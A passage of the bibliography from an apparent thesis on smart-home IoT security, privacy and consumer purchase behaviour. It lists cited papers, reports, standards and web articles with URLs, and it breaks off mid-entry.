http://www.sciencedirect.com/science/article/pii/S0378778815304357

156 Bibliography

[39] A. Cavoukian, J. Polonetsky, and C. Wolf, “SmartPrivacy for the Smart Grid: Embedding privacy into the design of electricity conservation,” Identity in the Information Society, vol. 3, no. 2, pp. 275–294, 2010. [Online]. Available: http://dx.doi.org/10.1007/s12394-010-0046-y

[40] H. Cavusoglu, B. K. Mishra, and S. Raghunathan, “The effect of Internet security breach announcements on market value: Capital market reactions for breached firms and Internet security developers,” Int. J. Electronic Commerce, vol. 9, no. 1, pp. 70–104, 2004. [Online]. Available: https://doi.org/10.1080/10864415.2004.11044320

[41] Z. B. Celik, L. Babun, A. K. Sikder, H. Aksu, G. Tan, P. D. McDaniel, and A. S. Uluagac, “Sensitive information tracking in commodity IoT,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 1687–1704. [Online]. Available: https://www.usenix.org/conference/ usenixsecurity18/presentation/celik

[42] Centre for European Policy Studies, “Software vulnerability disclosure in Europe – Technology, policies and legal challenges,” June 2018. [Online]. Available: https://www.cl.cam.ac.uk/∼rja14/Papers/ceps-rvd2018.pdf

[43] A. Chapman, “Hacking into Internet connected light bulbs,” July 2014. [Online]. Available: http://www.contextis.com/resources/blog/hacking-internet-connected- light-bulbs/

[44] T. Chattopadhyay, N. Feamster, M. V. X. Ferreira, D. Y. Huang, and S. M. Weinberg, “Selling a single item with negative externalities,” in The World Wide Web Conference (WWW’19). New York, NY, USA: ACM, 2019, pp. 196–206. [Online]. Available: http://doi.acm.org/10.1145/3308558.3313692

[45] J. Chen, W. Diao, Q. Zhao, C. Zuo, Z. Lin, X. Wang, W. C. Lau, M. Sun, R. Yang, and K. Zhang, “IoTFuzzer: Discovering memory corruptions in IoT through app-based fuzzing,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp- content/uploads/sites/25/2018/02/ndss2018 01A-1 Chen paper.pdf

[46] Q. A. Chen, Y. Yin, Y. Feng, Z. M. Mao, and H. X. Liu, “Exposing congestion attack on emerging connected vehicle based traffic signal control,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/ 25/2018/02/ndss2018 01B-2 Chen paper.pdf

[47] F. Cicirelli, G. Fortino, A. Giordano, A. Guerrieri, G. Spezzano, and A. Vinci, “On the design of smart homes: A framework for activity recognition in home

157 Bibliography

environment,” Journal of Medical Systems, vol. 40, no. 9, p. 200, July 2016. [Online]. Available: https://doi.org/10.1007/s10916-016-0549-7 [48] Cisco, “The Internet of Things reference model,” June 2014. [Online]. Available: http://cdn.iotwf.com/resources/71/IoT Reference Model White Paper June 4 2014.pdf [49] Clickworker, “Data management services: AI training data, text creation, web researches,” 2018. [Online]. Available: https://www.clickworker.com/ [50] A. Cocchia, Smart and Digital City: A Systematic Literature Review. Springer International Publishing, 2014, pp. 13–43. [Online]. Available: https://doi.org/10. 1007/978-3-319-06160-3 2 [51] J. Cohen, Statistical power analysis for the behavioral sciences. Lawrence Erlbaum Associates, 1988. [52] M. P. Conchar, G. M. Zinkhan, C. Peters, and S. Olavarrieta, “An integrated framework for the conceptualization of consumers’ perceived-risk processing,” Journal of the Academy of Marketing Science, vol. 32, no. 4, pp. 418–436, September 2004. [Online]. Available: https://doi.org/10.1177/0092070304267551 [53] B. Copos, K. N. Levitt, M. Bishop, and J. Rowe, “Is anybody home? Inferring activity from smart home network traffic,” in 2016 IEEE Security and Privacy Workshops, SP Workshops 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 245–251. [Online]. Available: https://doi.org/10.1109/SPW.2016.48 [54] A. Costin, J. Zaddach, A. Francillon, and D. Balzarotti, “A large-scale analysis of the security of embedded firmwares,” in Proceedings of the 23rd USENIX Security Symposium, San Diego, CA, USA, August 20-22, 2014., K. Fu and J. Jung, Eds. USENIX Association, 2014, pp. 95–110. [Online]. Available: https://www.usenix. org/conference/usenixsecurity14/technical-sessions/presentation/costin [55] B. P. Crow, I. Widjaja, J. G. Kim, and P. Sakai, “Investigation of the IEEE 802.11 medium access control (MAC),” in Proceedings IEEE INFOCOM ’97, The Conference on Computer Communications, Sixteenth Annual Joint Conference of the IEEE Computer and Communications Societies, Driving the Information Revo- lution, Kobe, Japan, April 7-12, 1997. IEEE Computer Society, 1997, pp. 126–133. [Online]. Available: https://doi.org/10.1109/INFCOM.1997.635122 [56] A. Das, N. Borisov, and M. Caesar, “Do you hear what I hear?: Fingerprinting smart devices through embedded acoustic components,” in Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security, Scottsdale, AZ, USA, November 3-7, 2014, G. Ahn, M. Yung, and N. Li, Eds. ACM, 2014, pp. 441–452. [Online]. Available: http://doi.acm.org/10.1145/2660267.2660325 [57] J. Datko and T. Reed, “NSA Playset: DIY hardware implant over I2C,” DEF CON 22, August 2014. [Online]. Available: https://www.defcon.org/images/defcon-

158 Bibliography

22/dc-22-presentations/Datko-Reed/DEFCON-22-Josh-Datko-Teddy-Reed-NSA- Playset-DIY-Hardware-Implant-over-l2c-UPDATED.pdf [58] F. D. Davis, “Perceived usefulness, perceived ease of use, and user acceptance of information technology,” MIS Quarterly, vol. 13, no. 3, pp. 319–340, 1989. [Online]. Available: http://misq.org/perceived-usefulness-perceived-ease-of- use-and-user-acceptance-of-information-technology.html [59] S. J. De and D. L. M´etayer, “Privacy harm analysis: A case study on smart grids,” in 2016 IEEE Security and Privacy Workshops, SP Workshops 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 58–65. [Online]. Available: https://doi.org/10.1109/SPW.2016.21 [60] P. de Pelsmacker, L. Driesen, and G. Rayp, “Do consumers care about ethics? Willingness to pay for fair-trade coffee,” The Journal of Consumer Affairs, vol. 39, no. 2, pp. 363–385, 2005. [Online]. Available: http://www.jstor.org/stable/23860612 [61] , “Ready for takeoff?” Consumer Survey, July 2015. [Online]. Avail- able: http://www2.deloitte.com/content/dam/Deloitte/de/Documents/technology- media-telecommunications/Smart%20Home%20Consumer%20Survey%20Text% 2020150701.pdf [62] T. Denning, T. Kohno, and H. M. Levy, “Computer security and the modern home,” Commun. ACM, vol. 56, no. 1, pp. 94–103, 2013. [Online]. Available: http://doi.acm.org/10.1145/2398356.2398377 [63] N. Dhanjani, “Hacking lightbulbs: Security evaluation of the Philips Hue personal wireless lighting system,” August 2013. [Online]. Available: http://www.dhanjani. com/blog/2013/08/hacking-lightbulbs.html [64] T. Dinev and P. Hart, “An extended privacy calculus model for e-commerce transactions,” Information Systems Research, vol. 17, no. 1, pp. 61–80, 2006. [Online]. Available: http://www.jstor.org/stable/23015781 [65] B. Dong, B. Andrews, K. P. Lam, M. H¨oynck, R. Zhang, Y.-S. Chiou, and D. Benitez, “An information technology enabled sustainability test-bed (ITEST) for occupancy detection through an environmental sensing network,” Energy and Buildings, vol. 42, no. 7, pp. 1038–1046, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S037877881000023X [66] M. D. Donno, N. Dragoni, A. Giaretta, and A. Spognardi, “DDoS-capable IoT : Comparative analysis and Mirai investigation,” Security and Communication Networks, vol. 2018, pp. 1–30, 2018. [Online]. Available: https://doi.org/10.1155/2018/7178164 [67] A. Drewnowski, H. Moskowitz, M. Reisner, and B. Krieger, “Testing consumer perception of nutrient content claims using conjoint analysis,” Public Health Nutrition, vol. 13, no. 5, pp. 688––694, 2010. [Online]. Available: https://doi.org/10.1017/S1368980009993119

159 Bibliography

[68] A. Dunkels, B. Gr¨onvall, and T. Voigt, “Contiki - A lightweight and flexible operating system for tiny networked sensors,” in 29th Annual IEEE Conference on Local Computer Networks (LCN 2004), 16-18 November 2004, Tampa, FL, USA, Proceedings. IEEE Computer Society, 2004, pp. 455–462. [Online]. Available: https://doi.org/10.1109/LCN.2004.38 [69] A. Ebadat, G. Bottegal, D. Varagnolo, B. Wahlberg, and K. H. Johansson, “Esti- mation of building occupancy levels through environmental signals deconvolution,” in BuildSys 2013, Proceedings of the 5th ACM Workshop On Embedded Systems For Energy-Efficient Buildings, Roma, Italy, November 13-14, 2013, 2013, pp. 8:1–8:8. [Online]. Available: http://doi.acm.org/10.1145/2528282.2528290 [70] ——, “Regularized deconvolution-based approaches for estimating room occupan- cies,” IEEE Trans. Automation Science and Engineering, vol. 12, no. 4, pp. 1157– 1168, 2015. [Online]. Available: http://dx.doi.org/10.1109/TASE.2015.2471305 [71] Ecobee, “Privacy policy & terms of use,” April 2015. [Online]. Available: https://www.ecobee.com/legal/use/ [72] F. Eggers and H. Sattler, “Hybrid individualized two-level choice-based conjoint (HIT-CBC): A new method for measuring preference structures with many attribute levels,” International Journal of Research in Marketing, vol. 26, no. 2, pp. 108–118, 2009. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S0167811609000214 [73] T. Ekwevugbe, N. Brown, V. Pakka, and D. Fan, “Real-time building occupancy sensing using neural-network based sensor network,” in 7th IEEE International Conference on Digital Ecosystems and Technologies, DEST 2013, Menlo Park, CA, USA, July 24-26, 2013. IEEE, 2013, pp. 114–119. [Online]. Available: https://doi. org/10.1109/DEST.2013.6611339 [74] P. Emami-Naeini, H. Dixon, Y. Agarwal, and L. F. Cranor, “Exploring how privacy and security factor into IoT device purchase behavior,” in Proceedings of the 2019 CHI Conference on Human Factors in Computing Systems, CHI 2019, Glasgow, Scotland, UK, S. A. Brewster, G. Fitzpatrick, A. L. Cox, and V. Kostakos, Eds. ACM, 2019. [Online]. Available: https://doi.org/10.1145/3290605.3300764 [75] European Commission, “Energy Efficiency Directive,” 2017. [Online]. Available: https://ec.europa.eu/energy/en/topics/energy-efficiency/energy-efficiency-directive [76] European Parliament and the Council of the European Union, “Directive 2010/30/EU,” May 2010. [Online]. Available: http://eur-lex.europa.eu/legal- content/EN/ALL/?uri=CELEX:32010L0030 [77] ——, “Regulation (EU) 2016/679,” April 2016. [Online]. Available: http://data. europa.eu/eli/reg/2016/679/oj [78] European Union Agency for Network and Information Security (ENISA), “Security and resilience of smart home environments – Good practices and recommendations,”

160 Bibliography

December 2015. [Online]. Available: https://www.enisa.europa.eu/publications/ security-resilience-good-practices

[79] ——, “Baseline security recommendations for IoT,” October 2017. [On- line]. Available: https://www.enisa.europa.eu/publications/baseline-security- recommendations-for-iot

[80] C. Fachkha, E. Bou-Harb, A. Keliris, N. D. Memon, and M. Ahamad, “Internet-scale probing of CPS: Inference, characterization and orchestration analysis,” in 24th An- nual Network and Distributed System Security Symposium, NDSS 2017, San Diego, California, USA, February 26 - March 1, 2017. The Internet Society, 2017. [Online]. Available: https://www.ndss-symposium.org/ndss2017/ndss-2017-programme/ internet-scale-probing-cps-inference-characterization-and-orchestration-analysis/

[81] X. Fan, Q. Xie, X. Li, H. Huang, J. Wang, S. Chen, C. Xie, and J. Chen, “Activity recognition as a service for smart home: Ambient assisted living application via sensing home,” in IEEE International Conference on AI & Mobile Services, AIMS 2017, Honolulu, HI, USA, June 25-30, 2017, S. Tata and Z. Mao, Eds. IEEE Computer Society, 2017, pp. 54–61. [Online]. Available: https://doi.org/10.1109/AIMS.2017.29

[82] F. Faul, E. Erdfelder, A.-G. Lang, and A. Buchner, “G*Power 3: A flexible statistical power analysis program for the social, behavioral, and biomedical sciences,” Behavior Research Methods, vol. 39, no. 2, pp. 175–191, May 2007. [Online]. Available: https://doi.org/10.3758/BF03193146

[83] M. Featherman and P. A. Pavlou, “Predicting e-services adoption: A perceived risk facets perspective,” Int. J. Hum.-Comput. Stud., vol. 59, no. 4, pp. 451–474, 2003. [Online]. Available: https://doi.org/10.1016/S1071-5819(03)00111-3

[84] Federal Ministry for Environment, Nature Conservation, Construction and Nuclear Safety (Germany), “Lifespan label for electrical products – Study on the effect of lifespan information for electrical products on the purchasing decision,” July 2017. [Online]. Available: https://www.bundesregierung.de/resource/blob/975272/ 323454/046091a8ccdc126cdfe3e827ed0c27c2/download-produktlabel-lebensdauer- eng-data.pdf

[85] Federal Office for Information Security (Germany), “Protection profile for the gateway of a smart metering system (Smart Meter Gateway PP),” March 2014. [Online]. Available: https://www.commoncriteriaportal.org/files/ppfiles/ pp0073b pdf.pdf

[86] Federal Statistical Office (Germany), “Germany Census 2011,” 2011. [Online]. Available: https://www.zensus2011.de/EN

[87] ——, “Germany Mikrozensus 2014,” 2014. [Online]. Available: https://www.gesis. org/en/missy/metadata/MZ/2014/

161 Bibliography

[88] Federal Trade Commission, “Energy and water use labeling for consumer products under the Energy Policy and Conservation Act (“Energy Labeling Rule”),” 2018. [Online]. Available: https://www.ftc.gov/enforcement/rules/rulemaking- regulatory-reform-proceedings/energy-water-use-labeling-consumer [89] X. Feng, Q. Li, H. Wang, and L. Sun, “Acquisitional rule-based engine for discovering Internet-of-Thing devices,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 327–341. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/feng [90] N. Fern, I. San, C¸. K. Ko¸c, and K. Cheng, “Hardware trojans in incompletely specified on-chip bus systems,” in 2016 Design, Automation & Test in Europe Conference & Exhibition, DATE 2016, Dresden, Germany, March 14-18, 2016, L. Fanucci and J. Teich, Eds. IEEE, 2016, pp. 527–530. [Online]. Available: http://ieeexplore.ieee.org/document/7459366/ [91] E. Fernandes, J. Jung, and A. Prakash, “Security analysis of emerging smart home applications,” in IEEE Symposium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 636–654. [Online]. Available: https://doi.org/10.1109/SP.2016.44 [92] E. Fernandes, J. Paupore, A. Rahmati, D. Simionato, M. Conti, and A. Prakash, “Flowfence: Practical data protection for emerging IoT application frameworks,” in 25th USENIX Security Symposium, USENIX Security 16, Austin, TX, USA, August 10-12, 2016., T. Holz and S. Savage, Eds. USENIX Association, 2016, pp. 531–548. [Online]. Available: https://www.usenix.org/conference/usenixsecurity16/technical- sessions/presentation/fernandes [93] E. Fernandes, A. Rahmati, J. Jung, and A. Prakash, “Decentralized action integrity for trigger-action IoT platforms,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ ndss/wp-content/uploads/sites/25/2018/02/ndss2018 01A-3 Fernandes paper.pdf

[94] A. Field, Discovering statistics using IBM SPSS statistics. Sage Publications, 2013. [95] J. FitzPatrick, “The Tao of hardware, the Te of implants,” Black Hat USA, August 2016. [Online]. Available: https://www.blackhat.com/docs/us-16/materials/us-16- FitzPatrick-The-Tao-Of-Hardware-The-Te-Of-Implants-wp.pdf [96] A. Forget, S. Pearman, J. Thomas, A. Acquisti, N. Christin, L. F. Cranor, S. Egelman, M. Harbach, and R. Telang, “Do or do not, there is no try: User engagement may not improve security outcomes,” in Twelfth Symposium on Usable Privacy and Security, SOUPS 2016, Denver, CO, USA, June 22-24, 2016. USENIX Association, 2016, pp. 97–111. [Online]. Available: https://www.usenix. org/conference/soups2016/technical-sessions/presentation/forget

162 Bibliography

[97] D. Formby, P. Srinivasan, A. Leonard, J. Rogers, and R. A. Beyah, “Who’s in control of your control system? Device fin- gerprinting for cyber-physical systems,” in 23rd Annual Network and Dis- tributed System Security Symposium, NDSS 2016, San Diego, California, USA, February 21-24, 2016. The Internet Society, 2016. [Online]. Avail- able: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2017/09/ who-control-your-control-system-device-fingerprinting-cyber-physical-systems.pdf [98] R. Fujdiak, P. Blazek, K. Mikhaylov, L. Malina, P. Mlynek, J. Misurec, and V. Blazek, “On track of Sigfox confidentiality with end-to-end encryption,” in Proceedings of the 13th International Conference on Availability, Reliability and Se- curity, ARES 2018, , Germany, August 27-30, 2018, S. Doerr, M. Fischer, S. Schrittwieser, and D. Herrmann, Eds. ACM, 2018, pp. 19:1–19:6. [Online]. Available: http://doi.acm.org/10.1145/3230833.3232805 [99] Gartner, “Gartner says 8.4 billion connected ”things” will be in use in 2017, up 31 percent from 2016,” February 2017. [Online]. Available: https://www.gartner.com/ newsroom/id/3598917 [100] Gartner IT Glossary, “The Internet of Things defined,” 2018. [Online]. Available: https://www.gartner.com/it-glossary/internet-of-things/

[101] J. Gershman, “Samsung faces class action over Galaxy Note 7 recalls,” The Wall Street Journal, October 2016. [Online]. Available: http://blogs.wsj.com/law/2016/ 10/18/samsung-faces-class-action-over-galaxy-note-7-recalls/ [102] S. Ghaffarzadegan, A. Reiss, M. Ruhs, R. Duerichen, and Z. Feng, “Occupancy detection in commercial and residential environments using audio signal,” in Proc. Interspeech 2017, 2017, pp. 3802–3806. [Online]. Available: http://dx.doi.org/10. 21437/Interspeech.2017-524 [103] T. J. Gilbride, P. J. Lenk, and J. D. Brazell, “Market share constraints and the loss function in choice-based conjoint analysis,” Marketing Science, vol. 27, no. 6, pp. 995–1011, 2008. [Online]. Available: https://doi.org/10.1287/mksc.1080.0369 [104] K. W. Glaister and P. J. Buckley, “Strategic motives for international alliance for- mation,” Journal of Management Studies, vol. 33, no. 3, pp. 301–332, 1996. [105] V. D. Gligor, “Handling new adversaries in wireless ad-hoc networks (transcript of discussion),” in Security Protocols XVI - 16th International Workshop, Cambridge, UK, ser. Lecture Notes in Computer Science, B. Christianson, J. A. Malcolm, V. Matyas, and M. Roe, Eds., vol. 6615. Springer, 2008, pp. 120–125. [Online]. Available: https://doi.org/10.1007/978-3-642-22137-8 18 [106] F. G´omez-Bravo, R. Jim´enez-Naharro, J. M. Garc´ıa, J. A. G. Gal´an, and M. Sanchez-Raya, “Hardware attacks on mobile robots: I2C clock attacking,” in Robot 2015: Second Iberian Robotics Conference - Advances in Robotics, Lisbon, Portugal, 19-21 November 2015, Volume 1, ser. Advances in Intelligent Systems

163 Bibliography

and Computing, L. P. Reis, A. P. Moreira, P. U. Lima, L. Montano, and V. F. Mu˜noz-Mart´ınez,Eds., vol. 417. Springer, 2015, pp. 147–159. [Online]. Available: https://doi.org/10.1007/978-3-319-27146-0 12 [107] D. Goodin, “9 Baby monitors wide open to hacks that expose users’ most private moments,” Ars Technica, September 2015. [Online]. Avail- able: https://arstechnica.com/information-technology/2015/09/9-baby-monitors- wide-open-to-hacks-that-expose-users-most-private-moments/ [108] T. Goodspeed, S. Bratus, R. Melgares, R. Speers, and S. W. Smith, “Api-do: Tools for exploring the wireless attack surface in smart meters,” in 45th Hawaii International Conference on Systems Science (HICSS-45 2012), Proceedings, 4-7 January 2012, Grand Wailea, Maui, HI, USA. IEEE Computer Society, 2012, pp. 2133–2140. [Online]. Available: http://dx.doi.org/10.1109/HICSS.2012.115 [109] L. A. Gordon, M. P. Loeb, and L. Zhou, “The impact of information security breaches: Has there been a downward shift in costs?” Journal of Computer Security, vol. 19, no. 1, pp. 33–56, 2011. [Online]. Available: https://doi.org/10.3233/JCS-2009-0398 [110] P. E. Green, A. M. Krieger, and Y. Wind, “Thirty years of conjoint analysis: Reflections and prospects,” Interfaces, vol. 31, no. 3, pp. 56–73, 2001. [Online]. Available: https://doi.org/10.1287/inte.31.3s.56.9676 [111] P. E. Green and V. Srinivasan, “Conjoint analysis in consumer research: Issues and outlook,” Journal of Consumer Research, vol. 5, no. 2, pp. 103–123, 1978. [Online]. Available: http://dx.doi.org/10.1086/208721 [112] U. Greveler, P. Gl¨osek¨otterz, B. Justusy, and D. Loehr, “Multimedia content identification through smart meter power usage profiles,” in Proceedings of the International Conference on Information and Knowledge Engineering (IKE), 2012. [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.727. 4674&rep=rep1&type=pdf [113] J. Hagedoorn, “Understanding the rationale of strategic technology partnering- interorganizational modes of cooperation and sectoral differences,” Strategic management journal, vol. 14, no. 5, pp. 371–385, 1993. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10.1002/smj.4250140505 [114] E. Hailemariam, R. Goldstein, R. Attar, and A. Khan, “Real-time occupancy detection using decision trees with multiple sensor types,” in 2011 Spring Simulation Multi-conference, SpringSim ’11, Boston, MA, USA, April 03-07, 2011., 2011, pp. 141–148. [Online]. Available: http://dl.acm.org/citation.cfm?id=2048555 [115] M. Hall, E. Frank, G. Holmes, B. Pfahringer, P. Reutemann, and I. H. Witten, “The WEKA data mining software: An update,” SIGKDD Explor. Newsl., vol. 11, no. 1, pp. 10–18, November 2009. [Online]. Available: http://doi.acm.org/10.1145/1656274.1656278

164 Bibliography

[116] R. Hallman, J. Bryan, G. Palavicini, J. DiVita, and J. Romero-Mariona, “IoDDoS - The Internet of distributed denial of sevice attacks - A case study of the Mirai malware and IoT-based botnets,” in Proceedings of the 2nd International Conference on Internet of Things, Big Data and Security, IoTBDS 2017, Porto, Portugal, April 24-26, 2017, M. Ramachandran, V. M. Mu˜noz, V. Kantere, G. Wills, R. J. Walters, and V. Chang, Eds. SciTePress, 2017, pp. 47–58. [Online]. Available: https://doi.org/10.5220/0006246600470058 [117] Z. Han, R. X. Gao, and Z. Fan, “Occupancy and indoor environment quality sensing for smart buildings,” in 2012 IEEE International Instrumentation and Measurement Technology Conference (I2MTC), May 2012, pp. 882–887. [Online]. Available: http://dx.doi.org/10.1109/I2MTC.2012.6229557 [118] S. M. Handmaker, “Good counsel: Using conjoint analysis to calculate damages,” Trial, June 2018. [Online]. Available: https://www.cohenmilstein.com/sites/ default/files/AAJ Trial Conjoint Analysis July 2018 Handmaker.pdf [119] G. W. Hart, “Residential energy monitoring and computerized surveillance via utility power flows,” Technology and Society Magazine, IEEE, vol. 8, no. 2, pp. 12– 16, 1989. [Online]. Available: https://ieeexplore.ieee.org/abstract/document/31557

[120] T. Hastie, R. Tibshirani, and J. H. Friedman, The Elements of Statistical Learning, 2nd ed. New York, NY, USA: Springer, 2009. [121] W. He, M. Golla, R. Padhi, J. Ofek, M. D¨urmuth, E. Fernandes, and B. Ur, “Rethinking access control and authentication for the home Internet of Things (IoT),” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 255–272. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/he [122] D. Heiland, “R7-2016-10: Multiple Osram Sylvania Osram Lightify vul- nerabilities (CVE-2016-5051 through 5059),” July 2016. [Online]. Available: https://community.rapid7.com/community/infosec/blog/2016/07/26/r7-2016-10- multiple-osram-sylvania-osram-lightify-/vulnerabilities-cve-2016-5051-through- 5059 [123] A. Hern, “Someone made a smart vibrator, so of course it got hacked,” The Guardian, August 2016. [Online]. Available: https://www.theguardian.com/ technology/2016/aug/10/vibrator-phone-app-we-vibe-4-plus-bluetooth-hack [124] M. Hicks, M. Finnicum, S. T. King, M. M. K. Martin, and J. M. Smith, “Overcoming an untrusted computing base: Detecting and removing malicious hardware automatically,” in 31st IEEE Symposium on Security and Privacy, S&P 2010, 16-19 May 2010, Berleley/Oakland, California, USA. IEEE Computer Society, 2010, pp. 159–172. [Online]. Available: https://doi.org/10.1109/SP.2010.18 [125] S. Hieke and P. Wilczynski, “Colour me in – An empirical study on

165 Bibliography

consumer responses to the traffic light signposting system in nutrition labelling,” Public Health Nutrition, vol. 15, no. 5, p. 773–782, 2012. [Online]. Available: https://doi.org/10.1017/S1368980011002874 [126] S. Higginbotham, “You can introduce the industrial Internet with a single light bulb,” Fortune, April 2015. [Online]. Available: http://fortune.com/2015/04/23/ industrial-internet-light-bulb/ [127] G. Ho, D. Leung, P. Mishra, A. Hosseini, D. Song, and D. A. Wagner, “Smart locks: Lessons for securing commodity Internet of Things devices,” in Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security, AsiaCCS 2016, Xi’an, China, May 30 - June 3, 2016, X. Chen, X. Wang, and X. Huang, Eds. ACM, 2016, pp. 461–472. [Online]. Available: http://doi.acm.org/ 10.1145/2897845.2897886 [128] M. B. Holbrook and W. L. Moore, “Conjoint analysis on objects with environmen- tally correlated attributes: The questionable importance of representative design,” Journal of Consumer Research, vol. 16, no. 4, pp. 490–497, March 1990. [Online]. Available: https://dx.doi.org/10.1086/209234 [129] Honeywell, “Honeywell connected home privacy statement,” December 2015. [Online]. Available: https://www.honeywell.com/privacy-statement [130] HopeRF Electronic, “RFM95/96/97/98(W) – Low power long range transceiver module V1.0 datasheet.” [Online]. Available: https://cdn.sparkfun.com/assets/ learn tutorials/8/0/4/RFM95 96 97 98W.pdf [131] J. F. Huber, D. Weiler, and H. Brand, “UMTS, the mobile multimedia vision for IMT 2000: A focus on standardization,” IEEE Communications Magazine, vol. 38, no. 9, pp. 129–136, September 2000. [Online]. Available: https://ieeexplore.ieee.org/abstract/document/868152 [132] J. Huber, D. R. Wittink, J. A. Fiedler, and R. Miller, “The effectiveness of alternative preference elicitation procedures in predicting choice,” Journal of Marketing Research, vol. 30, no. 1, pp. 105–114, 1993. [Online]. Available: https://doi.org/10.1177/002224379303000109 [133] V. Huppert, J. Paulus, U. Paulsen, M. Burkart, B. Wullich, and B. M. Eskofier, “Quantification of nighttime micturition with an ambulatory sensor-based system,” IEEE J. Biomedical and Health Informatics, vol. 20, no. 3, pp. 865–872, 2016. [Online]. Available: https://doi.org/10.1109/JBHI.2015.2421487 [134] IC Insights, “NXP acquires Freescale, becomes top MCU supplier in 2016,” April 2017. [Online]. Available: http://www.icinsights.com/news/bulletins/NXP- Acquires-Freescale-Becomes-Top-MCU-Supplier-In-2016/ [135] IControl, “IControl networks: 2015 state of the smart home report.” [Online]. Available: https://www.icontrol.com/blog/2015-state-of-the-smart-home-report

166 Bibliography

[136] IEEE Computer Society, “IEEE standard for information technology - Telecommu- nications and information exchange between systems - Local and metropolitan area networks specific requirements Part 15.4: Wireless medium access control (MAC) and physical layer (PHY) specifications for low-rate wireless personal area networks (LR-WPANs),” IEEE Std 802.15.4-2003, pp. 1–670, 2003. [137] Intel, “The Intel IoT platform – Architecture specification Internet of Things (IoT),” 2015. [Online]. Available: https://www.intel.de/content/www/de/de/internet-of- things/white-papers/iot-platform-reference-architecture-paper.html [138] Intel Security, “Intel security’s international Internet of Things smart home survey shows many respondents sharing personal data for money,” March 2016. [Online]. Available: https://newsroom.intel.com/news-releases/intel-securitys-international- internet-of-things-smart-home-survey [139] International Organization for Standardization, “ISO/IEC 30111:2013 – Information technology – Security techniques – Vulnerability handling processes,” November 2013. [Online]. Available: https://www.iso.org/standard/53231.html [140] ——, “ISO/IEC 29147:2014 – Information technology – Security techniques – Vulnerability disclosure,” February 2014. [Online]. Available: https://www.iso.org/ standard/45170.html

[141] J. Jacoby and L. B. Kaplan, “The components of perceived risk,” ACR Special Volumes, pp. 382–393, 1972. [Online]. Available: http://acrwebsite.org/volumes/ 12016/volumes/sv02/SV-02 [142] M. Jawurek, M. Johns, and F. Kerschbaum, “Plug-in privacy for smart metering billing,” in Privacy Enhancing Technologies - 11th International Symposium, PETS 2011, Waterloo, ON, Canada, July 27-29, 2011. Proceedings, ser. Lecture Notes in Computer Science, S. Fischer-H¨ubnerand N. Hopper, Eds., vol. 6794. Springer, 2011, pp. 192–210. [Online]. Available: http://dx.doi.org/10.1007/978-3-642-22263- 4 11 [143] M. Jawurek and F. Kerschbaum, “Privacy technologies for smart grids - a survey of options,” November 2012. [Online]. Available: https://www.microsoft.com/en- us/research/publication/privacy-technologies-for-smart-grids-a-survey-of-options/ [144] U. Jensen, P. Blank, P. Kugler, and B. Eskofier, “Unobtrusive and energy- efficient swimming exercise tracking using on-node processing,” IEEE Sensors Journal, vol. 16, no. 10, pp. 3972–3980, May 2016. [Online]. Available: https://doi.org/10.1109/JSEN.2016.2530019 [145] Y. J. Jia, Q. A. Chen, S. Wang, A. Rahmati, E. Fernandes, Z. M. Mao, and A. Prakash, “ContexloT: Towards providing con- textual integrity to appified IoT platforms,” in 24th Annual Network and Distributed System Security Symposium, NDSS 2017, San Diego, California, USA, February 26 - March 1, 2017. The Internet Society, 2017. [Online].

167 Bibliography

Available: https://www.ndss-symposium.org/ndss2017/ndss-2017-programme/ contexlot-towards-providing-contextual-integrity-appified-iot-platforms/

[146] C. Jones and O. Bonsignour, The Economics of Software Quality. Pearson Educa- tion, 2011. [Online]. Available: https://books.google.de/books?id=oEPjYVfUR1wC

[147] H. Kagermann, J. Helbig, A. Hellinger, and W. Wahlster, Umset- zungsempfehlungen f¨urdas Zukunftsprojekt Industrie 4.0: Deutschlands Zukunft als Produktionsstandort sichern; Abschlussbericht des Arbeitskreises Industrie 4.0 (in German). Forschungsunion, 2013. [Online]. Available: https://www.bmbf.de/files/ Umsetzungsempfehlungen Industrie4 0.pdf [148] D. Kahneman, J. L. Knetsch, and R. H. Thaler, “Fairness and the assumptions of economics,” The Journal of Business, vol. 59, no. 4, pp. 285–300, 1986. [Online]. Available: http://www.jstor.org/stable/2352761 [149] P. G. Kelley, J. Bresee, L. F. Cranor, and R. W. Reeder, “A ”nutrition label” for privacy,” in Proceedings of the 5th Symposium on Usable Privacy and Security, SOUPS 2009, Mountain View, California, USA, July 15-17, 2009, ser. ACM International Conference Proceeding Series, L. F. Cranor, Ed. ACM, 2009. [Online]. Available: http://doi.acm.org/10.1145/1572532.1572538 [150] P. G. Kelley, L. Cesca, J. Bresee, and L. F. Cranor, “Standardizing privacy notices: An online study of the nutrition label approach,” in Proceedings of the 28th International Conference on Human Factors in Computing Systems, CHI 2010, Atlanta, Georgia, USA, April 10-15, 2010, E. D. Mynatt, D. Schoner, G. Fitzpatrick, S. E. Hudson, W. K. Edwards, and 